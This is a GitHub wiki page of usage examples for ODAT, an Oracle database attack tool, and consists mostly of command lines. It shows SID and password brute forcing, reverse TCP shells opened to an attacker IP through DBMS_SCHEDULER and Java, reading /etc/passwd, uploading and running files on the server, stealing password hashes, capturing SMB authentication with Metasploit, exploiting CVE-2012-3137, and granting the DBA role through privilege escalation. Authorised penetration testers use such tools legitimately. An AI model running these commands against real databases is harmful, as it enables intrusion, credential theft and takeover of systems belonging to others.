Skip to content

Home

Jump to bottom Edit New page
quentinhardy edited this page Mar 1, 2016 · 15 revisions

Here are some examples to understand how to use ODAT.

Examples

  • You can list all modules:
./odat.py -h
  • When you have chosen a module (example: all), you can use it and you can list all features and options of the module:
./odat.py all -h

all module

The all module allows you to run all modules (depends on options that you have purchased).

It is useful when you want to known what you can do on a database server (with a valid SID or no, with a valid Oracle account or no).

  • run all ODAT modules on the 192.168.142.73 Oracle database server listening on the 1521 port:
./odat.py all -s 192.168.142.73 -p 1521

ODAT will search valid SID. It will search valid Oracle accounts on each Oracle Instance (SID) found. You can specify an option for credentials (see --accounts-file, --accounts-files, --login-as-pwd). For each valid account on each valid instance (SID), it will give you what each user can do (e.g. reverse shell, read files, become DBA).

  • If you known a SID (ex: ORCL):
./odat.py all -s 192.168.142.73 -p 1521 -d ORCL
  • If you don't known a SID, you will can give the number of character maximum and the charset to use (for the brute force attack) and the file containing SID (for the dictionary attack):
./odat.py all -s 192.168.142.73 -p 1521 --sids-max-size=3 --sid-charset='abc' --accounts-file=accounts.txt
  • If you known a SID (ex: ORCL) and an account (SYS/password):
./odat.py all -s $SERVER -p $PORT -d $SID -U $USER -P $PASSWORD

tnscmd module

This module can be used to communicate directly with the Oracle's TNS listener.

  • If you would like to know alias defined on the listener, you could use this following command:
./odat.py tnscmd -s $SERVER -p $PORT --ping
  • To know the remote database version, the following command can be used:
./odat.py tnscmd -s $SERVER -p $PORT --version
  • To know the remote database status, the following command can be used:
./odat.py tnscmd -s $SERVER -p $PORT --status

sidguesser module

This module search valid SID only.

  • You can give the file name containing a SID list:
./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt

passwordguesser module

This module has been created in order to try to guess Oracle users passwords.

  • This command will try to connect to the database using the Oracle username like the password (only) in order to don't block accounts with too many bad attempts:
./odat.py passwordguesser -s $SERVER -d $SID
  • If you want to try each Oracle username with multiple passwords:
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
  • If you want to use your login file and password file:
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-files accounts/logins.txt accounts/pwds.txt

To be sure that each login will be tested as password (uppercase and lowercase), the option --login-as-pwd can be used.

dbmsscheduler module

This module can be used to execute system commands on a remote database server. Useful to get a reverse tcp shell.

Note 1: It is not possible to:

~ get the output of the system command

~ to give some special chararacters in arguments to the system command (ex: >)

  • To get a reverse tcp shell when the remote database server is a Linux:
./odat.py dbmsscheduler -s $SERVER -d $SID -U $USER -P $PASSWORD --reverse-shell $MY_IP $A_LOCAL_PORT

Note 2: You don't need to open a listen port manually to have a reverse tcp shell: The module will open the specified port for you.

I think it is the most useful and most effective module: Many times I have meet Oracle users who can use the Oracle DBMS_SCHEDULER library but not the JAVA.

java module

This module can be used to execute system commands on a remote database server. Useful to get a shell or a reverse tcp shell.

  • To get a shell on the database server:
./odat.py java -s $SERVER -d $SID -U $USER -P $PASSWORD --shell
  • To get a reverse tcp shell:
./odat.py java -s $SERVER -d $SID -U $USER -P $PASSWORD --reverse-shell

oradbg module

This module can be used to execute system commands on a remote database server:

  • To execute the /bin/ls command:
./odat.py oradbg -s $SERVER -d $SID -U $USER -P $PASSWORD --exec /bin/ls

utlhttp module

This module allows you to forge HTTP requests. You can sendand receive HTTP request from the database server. It can be used to scan ports of a remote server. It is useful to knwon which localhost ports are listening for example.

  • The --test-module option exists on each module and it permits to known if the current Oracle user is allowed to use the module:
./odat.py utlhttp -s $SERVER -d $SID -U $USER -P $PASSWORD --test-module
  • You can scan some ports:
./odat.py utlhttp -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 1521,443,22
./odat.py utlhttp -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 20-30
  • You can send a HTTP request:
echo 'GET / HTTP/1.0\n' > ./temp.txt;
./odat.py utlhttp -s $SERVER -d $SID -U $USER -P $PASSWORD --send google.com 80 temp.txt ;
rm ./temp.txt

httpuritype module

This module can be used to scan ports and to forge some HTTP requests:

  • To scan ports:
/odat.py httpuritype -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 1521,443,22
./odat.py httpuritype -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 20-30
  • You can send a GET request:
./odat.py httpuritype -s $SERVER -d $SID -U $USER -P $PASSWORD --url 127.0.0.1:80

utltcp module

This module can be used to scan ports and it can be used to forge and to send TCP packet (ex: HTTP request).

  • To scan ports:
./odat.py utltcp -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 1521,443,22
  • To forge a HTTP GET request:
echo 'GET / HTTP/1.0\n\n' > ./temp.txt;
./odat.py utltcp -s $SERVER -d $SID -U $USER -P $PASSWORD --send-packet 127.0.0.1 80 ./temp.txt
rm ./temp.txt

ctxsys module

This module can be used to download a file stored on the database server:

  • To get the /etc/passwd file of the remote database server:
./odat.py ctxsys -s $SERVER -d $SID -U $USER -P $PASSWORD --getFile /etc/passwd

externaltable module

This module can be used to download files or to run script remotly.

Notes:

~ It is not possible to give an argument to the executable

~ The executable must be stored on the database server

~ The executable must have the execution bit enabled

  • To download the temp.sh file stored in /tmp/ in test.txt:
./odat.py externaltable -s $SERVER -d $SID -U $USER -P $PASSWORD --getFile /tmp/ temp.sh test.txt
  • To run the temp.sh executable stored in the /tmp/ folder of the database server:
./odat.py externaltable -s $SERVER -d $SID -U $USER -P $PASSWORD --exec /tmp/ temp.sh

dbmsxslprocessor module

This module can be used to upload a file on a remote database server:

  • To upload the test.txt local file in the /tmp/ folder like file.txt:
./odat.py dbmsxslprocessor -s $SERVER -d $SID -U $USER -P $PASSWORD --putFile /tmp/ file.txt test.txt

dbmsadvisor module

This module can be used to upload a file on the server.

  • To upload the test.txt local file in the /tmp/ folder like file.txt:
./odat.py dbmsadvisor -s $SERVER -d $SID -U $USER -P $PASSWORD --putFile /tmp/ file.txt ./test.txt

utlfile module

This module can be used to:

~ upload a file

~ download a file

~ delete a remote file

  • To download the /etc/passwd file:
./odat.py utlfile -s $SERVER -d $SID -U $USER -P $PASSWORD --test-module --getFile /etc/ passwd passwd.txt
  • To upload the test.txt file:
./odat.py utlfile -s $SERVER -d $SID -U $USER -P $PASSWORD --putFile /tmp/ file.txt test.txt
  • To delete the file.txt file stored in /tmp/:
./odat.py utlfile -s $SERVER -d $SID -U $USER -P $PASSWORD --removeFile /tmp/ file.txt

passwordstealer module

This module has been created in order to get hashed password quicly and to pickup hashed passwords from the history.

  • To get hashed passwords from the history:
./odat.py passwordstealer -s $SERVER -d $SID -U $USER -P $PASSWORD --get-passwords-from-history
  • To get hashed passwords from the users table:
./odat.py passwordstealer -s $SERVER -d $SID -U $USER -P $PASSWORD --get-passwords

dbmslob module

This module uses the DBMS_LOB Oracle library to download files remotely.

  • To download the passwd file stored in /etc/ to the tmp.txt local file:
./odat.py dbmslob -s $SERVER -d $SID -U $USER -P $PASSWORD --getFile /etc/ passwd temp.txt

smb module

This module allows to capture a SMB authentication.

Prerequisite in order to capture a challenge:

  • Oracle Database must be installed on Windows
  • Oracle Database services must not used a Windows network service account, a system account or a local service account.

Notice: To use this module, a tool to capture SMB authentication must be used (examples: metasploit or responder).

  • In this example, I have used the auxiliary/server/capture/smb metasploit module to capture the SMB authentication:
msfconsole
[...]
msf auxiliary(smb) > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
  • To make connect the Oracle Database server to our smb server, the following ODAT command can be used :
./odat.py smb -s $SERVER -d $SID -U $USER -P $PASSWORD --capture $MY-IP-ADDRESS SHARE-NAME

stealRemotePwds module

This module allows you to exploit the CVE-2012-3137 (http://www.cvedetails.com/cve/CVE-2012-3137/) vulnerability easily.

Note: Need root privileges in order to sniff session keys and salts from the network.

  • To test if the remote database is vulnerable:
sudo ./odat.py stealRemotePwds -s $SERVER -d $ID -U $USER -P $PASSWORD --test-module
  • With the previous command, ODAT will try to get the session key and salt. If it has these 2 values for the user given in command line (ie $USER), ODAT will try to decrypt the session key with your password given in command line (ie $PASSWORD). If the session id (value decrypted) starts with '\x08\x08\x08\x08\x08\x08\x08\x08', the password given (ie $PASSWORD) for this user (ie $USER) is valid and the target database is vulnerable to this CVE.
  • To get session keys and salts of users stored in the accounts_small.txt file:
sudo ./odat.py stealRemotePwds -s $SERVER -d $ID --user-list accounts_small.txt --get-all-passwords
  • To do a dictionary attack on session keys and salts:
sudo chmod o+r sessions-$SERVER-1521-$SID.txt; ./odat.py stealRemotePwds -s $SERVER -d $SID --decrypt-sessions sessions-$SERVER-1521-$SID.txt dede.txt

search module

This module allows you to search in column names easily.

  • To get column names which contains password like (ex: passwd, password, motdepasse, clave):
./odat.py search -s $SERVER -d $SID -U $USER -P $PASSWORD --pwd-column-names

By default, columns which do not contain data are not output by this module. To see columns which do not contain data, you should use the --show-empty-columns option:

./odat.py search -s $SERVER -d $SID -U $USER -P $PASSWORD --pwd-column-names --show-empty-columns
  • You can search patterns in column names manually (--columns option). To search column names which contain the pattern '%PASSWORD%':
./odat.py search -s $SERVER -d $SID -U $USER -P $PASSWORD --columns '%password%'
  • To search column names which contain password like patterns:
./odat.py search -s $SERVER -d $SID -U $USER -P $PASSWORD --columns '%password%'

unwrapper module

This module allows you to unwrap PL/SQL source code wrapped (Oracle 10, 11 and 12).

  • To unwrap PL/SQL source code from a local file:
./odat.py unwrapper --file code.txt

An example of file:

cat code.txt
a000000
1
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
d
140 df
dpvm2y/8e4GQNNJr8ynRmaVUXCcwg5BK7Z7WZy9GXsE+YUtphQwUvwrjGSgSmOM9b/RUVKIU
[...]
2A==
  • To unwrap PL/SQL source code from a remote database object (ex: package):
./odat.py unwrapper -s $SERVER -d $ID -U $USER -P $PASSWORD --object-name 'WRAPPED_OBJECT'
  • To see the wrapped PL/SQL source code remotely:
SELECT text FROM all_source WHERE name='WRAPPED_OBJECT' ORDER BY line

privesc module

  • This module allows you to gain privileged access (e.g. DBA) using system privileges given to Oracle user used to run this module.

  • With these following conbinaisons of system privileges, the Oracle user can become DBA using SYS's privileges:

  • CREATE PROCEDURE and EXECUTE ANY PROCEDURE

  • CREATE ANY TRIGER (and CREATE PROCEDURE)

  • ANALYZE ANY (and CREATE PROCEDURE)

  • CREATE ANY INDEX (and CREATE PROCEDURE)

  • With the CREATE ANY PROCEDURE privilege, it is possible to alter all Oracle users' passwords (e.g. SYS's password) using APEX_040200's privileges.

  • With this privesc module, you can give the DBA role to Oracle user used in this module (e.g. $USER). Here is an example using CREATE/EXECUTE ANY PROCEDURE privileges:

./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --dba-with-create-any-trigger
  • Also, it is possible to execute SQL requests as SYS manually. Here is an example using CREATE/EXECUTE ANY PROCEDURE privileges:
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --exec-with-execute-any-procedure 'GRANT dba TO $USER'
  • You can revoke the DBA role using the following command:
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --revoke-dba-role
  • As a reminder, you can use the following command to see commands of this module:
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h
  • The command --get-detailed-privs can be used to get system privileges and roles granted to Oracle user used to run this module. Also, it gets system privileges and roles given to roles granted to Oracle user.
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --get-detailed-privs
  • To see privileges and roles given to the current Oracle user only, the command --get-privs must be used:
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --get-privs
  • Notice these 2 previous commands underlines system privileges that can be exploited by this module to gain privileged access.
Quentin HARDY
[email protected]
[email protected]

Quentin HARDY: [email protected] or [email protected]

Clone this wiki locally